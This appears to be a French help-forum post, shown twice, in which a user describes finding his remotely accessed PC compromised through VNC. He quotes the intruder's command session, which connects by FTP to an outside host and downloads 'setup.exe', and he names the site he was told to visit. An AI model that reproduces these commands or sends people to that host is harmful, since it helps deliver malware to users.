Serveur VNC Hacké, dois-je m'inquiter ?
tibo
-
tibo -
tibo -
Bonjour,
J'utilise régulièrement un serveur VNC pour communiquer avec mon 2eme PC (n'étant pas chez moi).
L'autre jour en me connectant, je ne retrouve pas l'écran que j'avais laisser :
1- le gestionnaire des tache était ouvert a l'onglet processus
2- un cmd était ouvert :
tcp> legenda.hostbot.com 21
conect legenda ******** (mot de passe visible)
tcp> binari
non conecté
tcp>passive
non conecté
tcp>get setup.exe
tcp>by
3- un message windows était ouvert, m'indiquant je devait"installer les nouveau logiciel avec le panneau de configuration
je vous invite regarder la page http://legenda.hostbot.com
Mon anti-virus (Kaspersky) evidement a jours n'affichait absolument rien, il n'est pourtant pas configurable depuis un client VNC (on ne peut pas cliquer sur la fenêtre)
Mit a part le fait que le mec ai pu fouiller dans mon PC et récupérer des infos, Quelqu'un pourait-il m'expliquer ce qu'il a bien pu faire , et dois-je m'attendre a des attaque virus ou autre ?
merci.
J'utilise régulièrement un serveur VNC pour communiquer avec mon 2eme PC (n'étant pas chez moi).
L'autre jour en me connectant, je ne retrouve pas l'écran que j'avais laisser :
1- le gestionnaire des tache était ouvert a l'onglet processus
2- un cmd était ouvert :
tcp> legenda.hostbot.com 21
conect legenda ******** (mot de passe visible)
tcp> binari
non conecté
tcp>passive
non conecté
tcp>get setup.exe
tcp>by
3- un message windows était ouvert, m'indiquant je devait"installer les nouveau logiciel avec le panneau de configuration
je vous invite regarder la page http://legenda.hostbot.com
Mon anti-virus (Kaspersky) evidement a jours n'affichait absolument rien, il n'est pourtant pas configurable depuis un client VNC (on ne peut pas cliquer sur la fenêtre)
Mit a part le fait que le mec ai pu fouiller dans mon PC et récupérer des infos, Quelqu'un pourait-il m'expliquer ce qu'il a bien pu faire , et dois-je m'attendre a des attaque virus ou autre ?
merci.
A voir également:
- Serveur VNC Hacké, dois-je m'inquiter ?
- Changer serveur dns - Guide
- Serveur dns gratuit - Guide
- Serveur entrant et sortant - Guide
- Telecharger vnc viewer - Télécharger - Connexion à distance
- Tight vnc - Télécharger - Connexion à distance
que signifie un programme "blesser" ?